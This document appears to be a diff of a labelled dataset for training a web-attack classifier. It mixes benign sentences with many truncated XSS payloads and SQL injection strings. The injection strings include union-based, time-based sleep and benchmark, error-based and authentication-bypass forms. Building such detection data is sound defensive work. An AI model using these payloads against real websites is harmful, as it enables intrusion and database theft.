onfocus=alert(1)></listin,1,XSS,4271 -"<image onmouseleave=""alert(1)"">test</image>",1,XSS,8532 -"First, the largest size that I could select was si",0,normal,26189 -1' ) as fyuh where 7608 = 7608 and 4241 = convert ,2,SQLi,20471 -"<div id=""104""><svg xmlns=""http://www.w3.org/2000/s",1,XSS,9096 -Select your demand.,0,normal,24964 -Determine conditions where applicable.,0,normal,23359 -1 ) where 5385 = 5385 or 4411 = ( select count ( *,2,SQLi,16973 -"<bgsound onkeydown=""alert(1)"" contenteditable>test",1,XSS,3366 -1'+ ( select mhfn where 2425 = 2425,2,SQLi,19055 -<bdo onpointerout=alert(1)>XSS</bdo>,1,XSS,5516 -select * from users where id = '1' + @ @1 union se,2,SQLi,11782 +"-5771' ) ) union all select 2833,2833,2833,2833,28",2,SQLi,12995 +"ORDER BY 1,SLEEP(5),BENCHMARK(1000000,MD5('A')),4,",2,SQLi,10475 +1′) and '1′='1–,2,SQLi,9946 +<button onPause=javascript:alert(1)>,1,XSS,9646 +"-4541"" ) ) or make_set ( 4821 = 5233,5233 ) and ( ",2,SQLi,14895 +end and ( ( 'eqoc' like 'eqoc,2,SQLi,12664 +"{""id"":null,""firstName"":""Ign"",""lastName"":""Miao"",""sp",0,normal,27239 +<strike id=x tabindex=1 onactivate=alert(1)></stri,1,XSS,6684 +"<button onmouseup=""alert(1)"">test</button>",1,XSS,5431 +"<iframe src=""http://example.com/"" style=""width:800",1,XSS,9193 +"<address draggable=""true"" ondragenter=""alert(1)"">t",1,XSS,3789 +"{""id"":null,""name"":""Gardevoir""}",0,normal,27364 +<noscript id=x tabindex=1 onfocusin=alert(1)></nos,1,XSS,1786 +"<object draggable=""true"" ondragend=""alert(1)"">test",1,XSS,7119 +1 where 7425 = 7425 rlike ( select ( case when ( 4,2,SQLi,16881 +<td onpointerover=alert(1)>XSS</td>,1,XSS,4686 +"union (select NULL, (select @@version)) --",2,SQLi,10049 +"-9601' ) ) or 1 group by concat ( 0x7171706a71, ( ",2,SQLi,21163 +<optgroup onpointerout=alert(1)>XSS</optgroup>,1,XSS,2040 +"1"" ) ) as bovm where 5560 = 5560 union all select ",2,SQLi,20428 +<script>alert(document.getElementsByTagName('html',1,XSS,9284 +1' where 5023 = 5023 and 3580 = ( select count ( *,2,SQLi,19284 +Here are some photos and select translations from ,0,normal,26104 +"1"" ) ) as khqq where 3637 = 3637 and 8407 = ( sele",2,SQLi,12438 +It premieres on Netflix and in select theaters in ,0,normal,25958 +"<mark draggable=""true"" ondrag=""alert(1)"">test</mar",1,XSS,7879 +"<div draggable=""true"" contenteditable>drag me</div",1,XSS,3343 +1'+ ( select bgbq where 1589 = 1589 and 3715 in ( ,2,SQLi,19040 +You can choose the color of the paper and/or envel,0,normal,25096 +<title onpointermove=alert(1)>XSS</title>,1,XSS,5914 +To ensure success with finer pitch requirements it,0,normal,25269 +-6487 ) or 6872 = 6872 and ( 7688 = 7688,2,SQLi,21321 +"<style>@keyframes x{}</style><div style=""animation",1,XSS,8517 +<textarea autofocus onfocus=alert(1)>test</textare,1,XSS,2033 +"-9932"" union all select 4049,4049,4049--",2,SQLi,17200 +"RC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9",1,XSS,7238 +-5774' where 3632 = 3632 or ( 3177 = 4222 ) *4222-,2,SQLi,12758 +"1"" ) ) and row ( 6237,7469 ) > ( select count ( * ",2,SQLi,15330 +where,0,normal,26526 +-1700%' or 4149 = 3391#,2,SQLi,13986 +&#x000003c;,1,XSS,1081 +"1"" ) as dlfq where 8410 = 8410",2,SQLi,18613 +1' ) where 5883 = 5883 or 4411 = ( select count ( ,2,SQLi,15454 +Select a random number.,0,normal,24472 +1' where 5819 = 5819 and ( 1275 = 4759 ) *4759--,2,SQLi,17729 +Where did you find that beautiful flower?,0,normal,22920 +"-8600"" or elt ( 1032 = 1032,3623 ) and ""kfsn"" like",2,SQLi,18206 +1'+ ( select 'mxei' where 7811 = 7811 and char ( 1,2,SQLi,19648 +"<blockquote onkeypress=""alert(1)"" contenteditable>",1,XSS,5652 +"1"" ) ) ) procedure analyse ( extractvalue ( 9627,c",2,SQLi,15303 +Sort the color swatches.,0,normal,22722 +1 ) ) as somz where 1598 = 1598,2,SQLi,14509 +"<sup onbeforepaste=""alert(1)"" contenteditable>test",1,XSS,3865 +"<ul onmouseup=""alert(1)"">test</ul>",1,XSS,2938 +<time id=x tabindex=1 onbeforedeactivate=alert(1)>,1,XSS,3920 +>%22%27><img%20src%3d%22javascript:alert(%27%20XSS,1,XSS,1691 +"-3593%' union all select 6346,6346,6346,6346,6346,",2,SQLi,14350 +"<SCRIPT a="">"" '' SRC=""httx://xss.rocks/xss.js""></S",1,XSS,306 +"<wbr onmouseover=""alert(1)"">test</wbr>",1,XSS,4059 +1' ) ) rlike ( select ( case when ( 7689 = 7689 ) ,2,SQLi,19827 +"-7543' ) ) ) or 1 group by concat ( 0x7171706a71, ",2,SQLi,19386 +"{""id"":null,""name"":""Chatot""}",0,normal,27118 +"<video onerror=""javascript:alert(1)""><source>//INJ",1,XSS,9840 +"-4286%"" ) ) ) union all select 2229,2229,2229,2229",2,SQLi,17618 +";alert(String.fromCharCode(88,83,83))//';alert(Str",1,XSS,9709 +<main onpointerenter=alert(1)>XSS</main>,1,XSS,2315 +Select your target.,0,normal,24841 +1'+ ( select vfmy where 5711 = 5711,2,SQLi,21539 +"{""id"":null,""firstName"":""Elaine"",""lastName"":""Wong"",",0,normal,27369 +"{""id"":null,""name"":""American Eskimo Dog""}",0,normal,27583 +"-9119"" ) where 9237 = 9237 or 8571 = 8571--",2,SQLi,20708 +</script><svg onload=alert(1)>,1,XSS,9033 +"<b draggable=""true"" ondragstart=""alert(1)"">test</b",1,XSS,2064 +<ol onblur=alert(1) tabindex=1 id=x></ol><input au,1,XSS,6473 +if ( 6554 = 1534 ) select 6554 else drop function ,2,SQLi,17403 +<canvas id=x tabindex=1 onfocusin=alert(1)></canva,1,XSS,6480 +"1 ) ) ) and row ( 6237,7469 ) > ( select count ( *",2,SQLi,20286 +1'|| ( select 'zeet' from dual where 9567 = 9567 a,2,SQLi,19954 +"<data oncontextmenu=""alert(1)"">test</data>",1,XSS,5455 +||(SELECT 0x727a5277 FROM DUAL WHERE 1337=1337 AND,2,SQLi,11282 +Save up to $400 off select MacBook Pro and iMac,0,normal,25728 +admin'or 1=1 or ''=',2,SQLi,9909 +<time onpointerenter=alert(1)>XSS</time>,1,XSS,4273 +<audio onpointerover=alert(1)>XSS</audio>,1,XSS,8534 +Steve Grasso was a buyer of the Utilities Select S,0,normal,25520 +"1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71,",2,SQLi,20473 +"<div id=""108""><!-- IE 5-8 standards mode -->",1,XSS,9098 +Select your affirm.,0,normal,24961 +-3226'|| ( select 'ykdw' where 2617 = 2617 union a,2,SQLi,22068 +-9014' order by 1--,2,SQLi,16975 +"<thead oncopy=""alert(1)"" contenteditable>test</the",1,XSS,3368 +"1"" ) ) union all select null,null,null,null--",2,SQLi,19057 +"<progress oncopy=""alert(1)"" contenteditable>test</",1,XSS,5518 +select * from users where id = 11||1 union select ,2,SQLi,11784 "{""id"":null,""name"":""Golem""}",0,normal,27547 -"-5043%' ) ) ) union all select 5860,5860,5860,5860",2,SQLi,15311 -"<section onmouseenter=""alert(1)"">test</section>",1,XSS,2396 -Select acquire.,0,normal,24559 -"<template onclick=""alert(1)"">test</template>",1,XSS,5507 -"select benchmark ( 5000000,md5 ( 0x4c4d6142 ) ) an",2,SQLi,18555 +-8519%' ) ) or 4493 = utl_inaddr.get_host_address ,2,SQLi,15313 +"<option onmousedown=""alert(1)"">test</option>",1,XSS,2397 +"-8355%"" ) ) ) union all select 3004,3004,3004,3004",2,SQLi,21620 +<custom tags onpointerup=alert(1)>XSS</custom tags,1,XSS,5509 +"-2287' ) ) union all select 1200,1200,1200,1200,12",2,SQLi,18557 <ScRiPt>alert(1)</sCriPt>,1,XSS,925 -<button onpointerleave=alert(1)>XSS</button>,1,XSS,8135 -insert,0,normal,23106 -AND 1 = utl_inaddr.get_host_address ( ( SELECT DIS,2,SQLi,12071 -"1"" ) ) ) union all select null,null,null#",2,SQLi,17738 -""" ) or pg_sleep ( __TIME__ ) --",2,SQLi,11707 -<svg><s onload=alert(1)></s>,1,XSS,8672 -<header onpointerenter=alert(1)>XSS</header>,1,XSS,3125 -"1' and make_set ( 4952 = 7129,7129 )",2,SQLi,19159 -<style>:target {color:red;}</style><body id=x styl,1,XSS,7621 -"<option onmouseleave=""alert(1)"">test</option>",1,XSS,6560 -"1"" ) ) or char ( 119 ) ||char ( 100 ) ||char ( 99 ",2,SQLi,21842 -"<div id=""83""><x:template xmlns:x=""http://www.wapfo",1,XSS,9146 -1 ) ) ) or ( select * from ( select ( sleep ( 5 ) ,2,SQLi,12721 -"<form><button formaction=""javascript:alert(1)"">//I",1,XSS,9847 -Select the right lens for the camera.,0,normal,24098 -"{""id"":null,""name"":""dear""}",0,normal,26755 -<button onMediaComplete=javascript:alert(1)>,1,XSS,9628 -"<b draggable=""true"" ondragleave=""alert(1)"">test</b",1,XSS,5799 -<animatetransform onpointerenter=alert(1)>XSS</ani,1,XSS,5883 -><script+src=https://api.vk.com/method/wall.get?ca,1,XSS,9783 -;sleep 5,2,SQLi,11349 -1' in boolean mode ) and exp ( ~ ( select * from (,2,SQLi,21749 -"-6307' where 8916 = 8916 union all select 8916,891",2,SQLi,18566 -I'm considering where to spend my summer vacation.,0,normal,23922 -if ( 2697 = 2008 ) select 2697 else drop function ,2,SQLi,17858 -"<style>@keyframes slidein {}</style><link style=""a",1,XSS,6104 -"<link onclick=""alert(1)"">test</link>",1,XSS,6749 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13010 -<body onscroll=alert(1)><br><br><br><br>,1,XSS,9083 -1' and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ,2,SQLi,21630 -"1"" where 2394 = 2394 and 8831 = 8333--",2,SQLi,21384 -if ( 7427 = 7800 ) select 7427 else drop function ,2,SQLi,15967 -Select a topic for the discussion.,0,normal,24124 -"<kbd onclick=""alert(1)"">test</kbd>",1,XSS,5541 +"<nextid onkeyup=""alert(1)"" contenteditable>test</n",1,XSS,8137 +select,0,normal,23103 +"select * from users where id = 1 or ""{%"" or 1 = 1 ",2,SQLi,12073 +"1' procedure analyse ( extractvalue ( 9255,concat ",2,SQLi,17740 +"select * from users where id = 1 or ""@ ) "" or 1 = ",2,SQLi,11709 +<cite onpointerdown=alert(1)>XSS</cite>,1,XSS,8674 +<spacer onpointerleave=alert(1)>XSS</spacer>,1,XSS,3126 +1 ) as afxc where 7497 = 7497,2,SQLi,19161 +"<code onbeforecut=""alert(1)"" contenteditable>test<",1,XSS,7623 +"<picture onmousedown=""alert(1)"">test</picture>",1,XSS,6562 +1%' ) or 4411 = ( select count ( * ) from sysusers,2,SQLi,21840 +"<div id=""87""><svg xmlns=""http://www.w3.org/2000/sv",1,XSS,9148 +"-5520%"" union all select 5235,5235,5235,5235,5235,",2,SQLi,12723 +"<script>$=1,alert($)</script>//INJECTX",1,XSS,9849 +Select a fragrance for your space.,0,normal,24095 +"{""id"":null,""firstName"":""Horace"",""lastName"":""Hutape",0,normal,26752 +<button onMessage=javascript:alert(1)>,1,XSS,9630 +"<thead onmousedown=""alert(1)"">test</thead>",1,XSS,5801 +"<header ondblclick=""alert(1)"">test</header>",1,XSS,5885 +><script+src=http://app-e.marketo.com/index.php/fo,1,XSS,9785 +;sleep(5),2,SQLi,11351 +1%' ) and 3715 in ( ( char ( 113 ) +char ( 113 ) +,2,SQLi,21747 +1 ) ) union all select null#,2,SQLi,18568 +Where's the best place to try new cuisines?,0,normal,23919 +-8710 or 9323 = 9323#,2,SQLi,17860 +"<style>@keyframes x{}</style><big style=""animation",1,XSS,6106 +<rtc onpointerover=alert(1)>XSS</rtc>,1,XSS,6751 +select case when 1613 = 2937 then 1 else null end-,2,SQLi,13012 +<body style=overflow:auto;height:1000px onscroll=a,1,XSS,9085 +Index columns where necessary.,0,normal,23348 +1' ) and char ( 111 ) ||char ( 77 ) ||char ( 121 ),2,SQLi,21382 +"1"" where 7005 = 7005",2,SQLi,15969 +"{""id"":null,""name"":""potatoes drive""}",0,normal,27576 +"<dd onbeforecut=""alert(1)"" contenteditable>test</d",1,XSS,5543 --><!-- ---> <img src=xxx:x onerror=javascript:ale,1,XSS,422 -1 ) as qodq where 4945 = 4945 or 9643 = ( select c,2,SQLi,16082 -1 and 3707 = ( select count ( * ) from sysibm.syst,2,SQLi,18691 -"elt ( 5098 = 2728,1 )",2,SQLi,16556 -<fieldset onfocusout=alert(1) tabindex=1 id=x></fi,1,XSS,3957 -"<LINK REL=""stylesheet"" HREF=""javascript:alert('');",1,XSS,5607 -Select pack.,0,normal,24695 -select * from users where id = '1' or \.<\ union s,2,SQLi,11381 -<BODY BACKGROUND=�javascript:alert(�XSS�)�>,1,XSS,1726 -"<IMG SRC=x onunload=""alert(String.fromCharCode(88,",1,XSS,1185 -) or '1'='1,2,SQLi,9975 -1%' ) ) or ( select * from ( select ( sleep ( 5 ) ,2,SQLi,16789 -Create a captivating story with your imagination.,0,normal,22933 +"-2241 ) ) ) or make_set ( 9354 = 9354,7185 ) and (",2,SQLi,16084 +-7345 ) union all select 3866#,2,SQLi,18693 +"1%"" ) ) ) union all select null,null,null--",2,SQLi,16558 +"<tbody oncut=""alert(1)"" contenteditable>test</tbod",1,XSS,3959 +"<nav draggable=""true"" ondragenter=""alert(1)"">test<",1,XSS,5609 +Select cover.,0,normal,24692 +) or ( 'a' = 'a,2,SQLi,11383 +<BODY ONLOAD=alert(�XSS�)>,1,XSS,1727 +"<IMG SRC=x onblur=""alert(String.fromCharCode(88,83",1,XSS,1186 +) or '1'='1'--,2,SQLi,9977 +1'+ ( select oljg where 2006 = 2006 and 3754 = ( s,2,SQLi,16791 +-5352%' ) ) ) or 2724 in ( ( char ( 113 ) +char ( ,2,SQLi,21561 "<script/src=""data&colon;text%2Fj\u0061v\u0061scrip",1,XSS,905 -if ( 7340 = 9813 ) select 7340 else drop function ,2,SQLi,19879 -<style>@keyframes x{from {left:0;}to {left: 1000px,1,XSS,8347 -"-6294"" union all select 9921,9921,9921,9921,9921,9",2,SQLi,17246 -<samp id=x tabindex=1 onfocusin=alert(1)></samp>,1,XSS,7798 -<style>:target {transform: rotate(180deg);}</style,1,XSS,6090 -"<nextid onmouseup=""alert(1)"">test</nextid>",1,XSS,2081 -<isindex id=x tabindex=1 ondeactivate=alert(1)></i,1,XSS,7929 -1' ) or 7552 = ( select count ( * ) from rdb$field,2,SQLi,13854 -I need to select a playlist for the road trip.,0,normal,23949 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7934 -)%20waitfor%20delay%20'0:0:20'%20/*,2,SQLi,10847 -"1"" ) ) as lomw where 9257 = 9257 union all select ",2,SQLi,12178 -"<svg><![CDATA[><image xlink:href=""]]><img src=xx:x",1,XSS,9317 -Let's decide where to have our lunch.,0,normal,23764 -I need to decide where to go for a weekend trip.,0,normal,23796 -"admin"" or ""1""=""1""#",2,SQLi,9928 -"<object oncopy=""alert(1)"" contenteditable>test</ob",1,XSS,7212 -1 ) ) as gocb where 4335 = 4335,2,SQLi,21062 -<dir id=x tabindex=1 ondeactivate=alert(1)></dir><,1,XSS,6534 -"<blockquote onkeydown=""alert(1)"" contenteditable>t",1,XSS,5210 -"<style>@keyframes x{}</style><s style=""animation-n",1,XSS,2647 -"or benchmark(10000000,MD5(1))#",2,SQLi,10074 -"-9496 ) ) ) or elt ( 7511 = 3951,3951 ) and ( ( ( ",2,SQLi,16826 -"UNION SELECT @@VERSION,SLEEP(5),USER(),4#",2,SQLi,10623 -She chose a dessert recipe to bake from scratch.,0,normal,23678 +"-5903%' ) union all select 8293,8293,8293,8293,829",2,SQLi,19881 +<style>:target {color:red;}</style><script id=x st,1,XSS,8349 +1 ) where 6954 = 6954 and 3824 = benchmark ( 50000,2,SQLi,17248 +"<figcaption ondblclick=""alert(1)"">test</figcaption",1,XSS,7800 +"<map draggable=""true"" ondragleave=""alert(1)"">test<",1,XSS,6092 +<style>:target {color:red;}</style><ruby id=x styl,1,XSS,2082 +"<title draggable=""true"" ondragleave=""alert(1)"">tes",1,XSS,7931 +1' ) ) and sleep ( 5 ) and ( ( 'jiio' like 'jiio,2,SQLi,13856 +I want to choose a restaurant for a special occasi,0,normal,23946 +"<time onkeypress=""alert(1)"" contenteditable>test</",1,XSS,7936 +""")%20waitfor%20delay%20'0:0:20'%20/*",2,SQLi,10849 +1'+ ( select syrz where 7699 = 7699 union all sele,2,SQLi,12180 +"<svg><script xlink:href=data:,alert(1) />",1,XSS,9319 +Aggregate data where necessary.,0,normal,23345 +Where did you find that vintage record from?,0,normal,23793 +"admin""or 1=1 or """"=""",2,SQLi,9930 +"<s onkeypress=""alert(1)"" contenteditable>test</s>",1,XSS,7214 +"1"" ) ) or elt ( 5873 = 5873,sleep ( 5 ) ) #",2,SQLi,21064 +<rtc id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,6536 +"<fieldset onbeforepaste=""alert(1)"" contenteditable",1,XSS,5212 +"<i onmousemove=""alert(1)"">test</i>",1,XSS,2648 +hi or 1=1 --,2,SQLi,10076 +"1"" ) where 8254 = 8254 and char ( 107 ) ||char ( 1",2,SQLi,16828 +"UNION SELECT @@VERSION,SLEEP(5),USER(),BENCHMARK(1",2,SQLi,10625 +Let's choose the location for our party.,0,normal,23675 "{""id"":null,""name"":""gentle""}",0,normal,27591 -<<SCRIPT>document.vulnerable=true;//<</SCRIPT>,1,XSS,1479 +<script <B>document.vulnerable=true;</script>,1,XSS,1480 "<object id=""x"" classid=""clsid:CB927D12-4FF7-4a9e-A",1,XSS,693 -"{""id"":null,""name"":""halfway college""}",0,normal,26886 -"<footer onpaste=""alert(1)"" contenteditable>test</f",1,XSS,6366 -I'll select my tuxedo.,0,normal,24362 -"1"" ) ) and 3824 = benchmark ( 5000000,md5 ( 0x7655",2,SQLi,18540 -"<frame onmousedown=""alert(1)"">test</frame>",1,XSS,7371 -"alert(String.fromCharCode(88,83,83));'))"">",1,XSS,1302 -<svg><colgroup onload=alert(1)></colgroup>,1,XSS,7838 -"1"" ) ) or 4915 = ( select count ( * ) from domain.",2,SQLi,14878 -"<sub onkeyup=""alert(1)"" contenteditable>test</sub>",1,XSS,3716 -I need to select the right music for the party.,0,normal,23830 -"<br onpaste=""alert(1)"" contenteditable>test</br>",1,XSS,5038 -"<iframe onmouseleave=""alert(1)"">test</iframe>",1,XSS,4400 --2036' ) or ( 8459 = 8459 ) *4906 and ( 'hjeu' = ',2,SQLi,20007 -"1"" ) ) ) and 7756 = dbms_utility.sqlid_to_sqlhash ",2,SQLi,13841 -1' ) as jwch where 4609 = 4609,2,SQLi,20901 -") AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AND ",2,SQLi,11295 -<style>:target {color: red;}</style><area id=x sty,1,XSS,7355 -1' ) as tsge where 6970 = 6970,2,SQLi,16123 -"<kbd onpaste=""alert(1)"" contenteditable>test</kbd>",1,XSS,8751 -1' ) ) ) and 4386 = utl_inaddr.get_host_address ( ,2,SQLi,21742 -&lt;IMG SRC=&quot;jav&amp;#x09;ascript:alert(&apos,1,XSS,1437 +Retrieve rows where valid.,0,normal,23320 +<svg><set onbegin=alert(1) attributename=x dur=1s>,1,XSS,6368 +Select your dream wedding cake.,0,normal,24359 +"1%"" union all select null,null,null,null,null,null",2,SQLi,18542 +<s onpointerenter=alert(1)>XSS</s>,1,XSS,7373 +<iframe<?php echo chr(11)?> onload=alert('XSS')></,1,XSS,1303 +<input4 onpointerdown=alert(1)>XSS</input4>,1,XSS,7840 +"1"" ) or 9643 = ( select count ( * ) from domain.do",2,SQLi,14880 +"<style>@keyframes x{}</style><multicol style=""anim",1,XSS,3718 +I'm considering where to go for a leisurely walk.,0,normal,23827 +<template id=x tabindex=1 onactivate=alert(1)></te,1,XSS,5040 +<ul onpointerdown=alert(1)>XSS</ul>,1,XSS,4402 +-8923'+ ( select xgvz where 9858 = 9858 union all ,2,SQLi,20009 +1' ) ) as qqvk where 1007 = 1007,2,SQLi,13843 +"-7107"" ) ) ) order by 1#",2,SQLi,20903 +"))) AND 1337=BENCHMARK(5000000,MD5(0x774c5341)) AN",2,SQLi,11297 +"<button draggable=""true"" ondragstart=""alert(1)"">te",1,XSS,7357 +1 ( select ( case when ( 4587 = 4587 ) then regexp,2,SQLi,16125 +"<style>@keyframes x{}</style><output style=""animat",1,XSS,8753 +"1"" ) and make_set ( 4553 = 8132,8132 ) and ( ""pfci",2,SQLi,21740 +&lt;IMG SRC=&quot;jav&amp;#x0A;ascript:alert(&apos,1,XSS,1438 "<a href=""\x09javascript:javascript:alert(1)"" id=""f",1,XSS,508 -1' ) and 1987 = 3756#,2,SQLi,16018 -"<div draggable=""true"" contenteditable>drag me</div",1,XSS,5403 -"<colgroup ondblclick=""alert(1)"">test</colgroup>",1,XSS,5931 -As they're offering up to 43% off select Delsey Pa,0,normal,26347 -"<footer draggable=""true"" ondragenter=""alert(1)"">te",1,XSS,8948 -"{""id"":null,""firstName"":""Linda"",""lastName"":""Phua"",""",0,normal,27311 -1 ) or ( select * from ( select ( sleep ( 5 ) ) ) ,2,SQLi,18724 -"1' ) ) or 6979 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,12243 -1 ) as fhvr where 5544 = 5544,2,SQLi,17304 -<noscript onpointerup=alert(1)>XSS</noscript>,1,XSS,4387 -1'+ ( select 'zirh' where 9054 = 9054 and 3824 = b,2,SQLi,12745 -ORDER BY 7,2,SQLi,10311 -"-3283 ) where 1948 = 1948 union all select 1948,19",2,SQLi,17668 -Select the right angle for the photo.,0,normal,24075 -"<code oncontextmenu=""alert(1)"">test</code>",1,XSS,8694 -waitfor delay '0:0:5'# ogzq,2,SQLi,17028 -<![<!--]]<script>document.vulnerable=true;//--></s,1,XSS,1540 -"<div id=""133""><!-- `<img/src=xx:xx onerror=alert(1",1,XSS,9122 -"<IMG SRC=x ondragstart=""alert(String.fromCharCode(",1,XSS,1212 -"1' and 3202 = like ( 'abcdefg',upper ( hex ( rando",2,SQLi,15285 -Select your idea.,0,normal,24847 -"<details draggable=""true"" ondragend=""alert(1)"">tes",1,XSS,2561 -"1"" ) ) ) and 4595 = 4595#",2,SQLi,13108 -"1"" where 4633 = 4633 and char ( 120 ) ||char ( 106",2,SQLi,13030 -admin' ) or '1' = '1'#,2,SQLi,11570 -1 ) ) ) and 8594 = ( select 8594 from pg_sleep ( 5,2,SQLi,12669 +-5995' ) ) or 6872 = 6872 and ( ( 'pywh' = 'pywh,2,SQLi,16020 +<rb onpointerenter=alert(1)>XSS</rb>,1,XSS,5405 +<bdo id=x tabindex=1 onbeforedeactivate=alert(1)><,1,XSS,5933 +Associations could self-select by accepting only b,0,normal,26344 +<details onpointerover=alert(1)>XSS</details>,1,XSS,8950 +"{""id"":null,""name"":""course""}",0,normal,27310 +"select benchmark ( 5000000,md5 ( 0x714e4153 ) ) #",2,SQLi,18726 +"1' or extractvalue ( 1297,concat ( 0x5c,0x7171706a",2,SQLi,12245 +select case when 1238 = 9044 then 1 else null end-,2,SQLi,17306 +<img onfocusout=alert(1) tabindex=1 id=x></img><in,1,XSS,4389 +"1 ) ) ) union all select null,null,null,null,null-",2,SQLi,12747 +ORDER BY 9,2,SQLi,10313 +"1%' ) ) ) or 8466 = benchmark ( 5000000,md5 ( 0x69",2,SQLi,17670 +Select the perfect camera settings.,0,normal,24072 +"<track onbeforepaste=""alert(1)"" contenteditable>te",1,XSS,8696 +"-7689' union all select 8739,8739,8739,8739,8739,8",2,SQLi,17030 +<!-- -- --><script>document.vulnerable=true;</scri,1,XSS,1541 +"<div id=""135""><?xml-stylesheet type=""text/xsl"" hre",1,XSS,9124 +"<IMG SRC=x ondrop=""alert(String.fromCharCode(88,83",1,XSS,1213 +"1' and 3824 = benchmark ( 5000000,md5 ( 0x76555642",2,SQLi,15287 +She chose a menu for the dinner party from the che,0,normal,23762 +"<content onmouseover=""alert(1)"">test</content>",1,XSS,2562 +select pg_sleep ( 5 ) and ( ( ( '%' = ',2,SQLi,13110 +-4615' or 4493 = utl_inaddr.get_host_address ( chr,2,SQLi,13032 +or '7659' = '7659,2,SQLi,11572 +1' where 6795 = 6795 and 8635 = ( select count ( *,2,SQLi,12671 "<applet onError applet onError=""javascript:javascr",1,XSS,391 -"1"" ) ) or 7552 = ( select count ( * ) from rdb$fie",2,SQLi,17849 -"1"" ) as cxwd where 5800 = 5800 or 6979 = like ( 'a",2,SQLi,17577 -"hi"""") or (""""a""""=""""a""",2,SQLi,10065 -<rp onpointerover=alert(1)>XSS</rp>,1,XSS,3591 -;sleep(5),2,SQLi,11351 -"<style>@keyframes x{}</style><progress style=""anim",1,XSS,8436 -"<time draggable=""true"" ondragenter=""alert(1)"">test",1,XSS,6720 -"1"" ) union all select null,null,null,null,null,nul",2,SQLi,15541 -"1, ( select ( case when ( 2970 = 5830 ) then 1 els",2,SQLi,16891 -"1' ) ) union all select null,null,null,null,null,n",2,SQLi,14694 +"1 ) where 4768 = 4768 union all select null,null,n",2,SQLi,17851 +"1"" ) as boeh where 2571 = 2571 union all select nu",2,SQLi,17579 +pg_sleep(__TIME__)--,2,SQLi,10067 +"<option onmouseenter=""alert(1)"">test</option>",1,XSS,3593 +1 SELECT SLEEP(5); #,2,SQLi,11353 +<menu onpointerenter=alert(1)>XSS</menu>,1,XSS,8438 +"<image draggable=""true"" ondragenter=""alert(1)"">tes",1,XSS,6722 +"1"" where 9725 = 9725",2,SQLi,15543 +-4176'+ ( select 'muio' where 4256 = 4256 union al,2,SQLi,16893 +if ( 6745 = 4078 ) select 6745 else drop function ,2,SQLi,14696 "<""';alert(String.fromCharCode(88,83,83))//\';alert",1,XSS,947 -1'|| ( select 'vqag' from dual where 8154 = 8154 u,2,SQLi,15577 -"-3879' union all select 9814,9814,9814,9814,9814,9",2,SQLi,14328 -"{""id"":null,""firstName"":""Kee Hwee"",""lastName"":""Tan""",0,normal,26850 -"select count ( * ) from rdb$fields as t1,rdb$types",2,SQLi,21732 -Senate Select Committee on Intelligence Vice Chair,0,normal,25561 -<div onpointerenter=alert(1)>XSS</div>,1,XSS,2548 -"1"" ) or sleep ( 5 ) #",2,SQLi,18158 -"-8410"" or 5023 = ctxsys.drithsx.sn ( 5023, ( chr (",2,SQLi,13008 +"1"" ) ) ) and 4967 = 8866 and ( ( ( ""jzyn"" like ""jz",2,SQLi,15579 +1' or 8421 = ( select count ( * ) from generate_se,2,SQLi,14330 +Select a topic I have a smelly green discharge I h,0,normal,25655 +Select lead.,0,normal,24658 +Select your dream honeymoon.,0,normal,24355 +<object id=x onfocusin=alert(1) type=text/html>,1,XSS,2549 +1 ) ) as eigk where 2557 = 2557,2,SQLi,18160 +"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,13010 <BODY ONLOAD=alert('XSS')>,1,XSS,273 -1 and 9122 = 4153# nxcv,2,SQLi,20828 -"<script> setTimeout(\\""writetitle()\\"",$\_GET\[\])",1,XSS,3619 -"1' ) ) or 8384 = like ( 'abcdefg',upper ( hex ( ra",2,SQLi,18766 -collate,0,normal,23188 -<style>:target {transform: rotate(180deg);}</style,1,XSS,7009 -1'+ ( select goec where 9460 = 9460 rlike ( select,2,SQLi,22123 -<script> var xdr = new ActiveXObject(%22Microsoft.,1,XSS,9270 -Much attention has been paid recently to the culti,0,normal,25873 -<shadow onblur=alert(1) tabindex=1 id=x></shadow><,1,XSS,4634 -select ( case when ( 4780 = 4432 ) then 4780 else ,2,SQLi,17131 -<thead onpointermove=alert(1)>XSS</thead>,1,XSS,7708 -1'|| ( select 'zeet' from dual where 9567 = 9567 a,2,SQLi,19954 -`'><script>\xE2\x80\x89javascript:alert(508)</scri,1,XSS,8983 -Select your spy.,0,normal,24986 -1'+ ( select 'njee' where 4101 = 4101 and 3090 = 7,2,SQLi,14313 -"UNION ALL SELECT 'INJ'||'ECT'||'XXX',2,3,4,5,6,7,8",2,SQLi,10763 -1' ) as taay where 7027 = 7027 and elt ( 4249 = 42,2,SQLi,13946 -"select count ( * ) from sysibm.systables as t1,sys",2,SQLi,14343 -<embed onpointerleave=alert(1)>XSS</embed>,1,XSS,5600 -"<script>d.innerHTML+='';</script>//[""'`-->]]>]</di",1,XSS,9291 --7369 or 9323 = 9323#,2,SQLi,15990 -) or sleep(5)=,2,SQLi,10356 -<content onpointerenter=alert(1)>XSS</content>,1,XSS,3638 -"-3074' ) ) union all select 6131,6131,6131,6131,61",2,SQLi,20598 -Show me where it's used.,0,normal,23261 -1' ) and 6240 = ( 'qqpjq'|| ( select case 6240 whe,2,SQLi,18297 -"Why not select some Christmas dinnerware for baby,",0,normal,25123 +-1687 ) ) as lnva where 8396 = 8396 union all sele,2,SQLi,20830 +<tfoot onfocusout=alert(1) tabindex=1 id=x></tfoot,1,XSS,3621 +1 ) where 6039 = 6039 and 2853 = cast ( ( chr ( 11,2,SQLi,18768 +intersect,0,normal,23185 +"<option onkeyup=""alert(1)"" contenteditable>test</o",1,XSS,7011 +"{""id"":null,""name"":""Australian Mist""}",0,normal,27612 +<script> var+x+=+showModelessDialog+(this); alert(,1,XSS,9272 +Nicole: I need to select the lenses from the case.,0,normal,25870 +<body onbeforeprint=alert(1)>,1,XSS,4636 +1 or 9643 = ( select count ( * ) from domain.domai,2,SQLi,17133 +"<option onmousemove=""alert(1)"">test</option>",1,XSS,7710 +1%' ) and 2006 = 2006,2,SQLi,19956 +`'><script>\xE2\x80\x8Bjavascript:alert(528)</scri,1,XSS,8985 +( case when 5640 = 5640 then 5640 else null end ),2,SQLi,22345 +"-6593"" 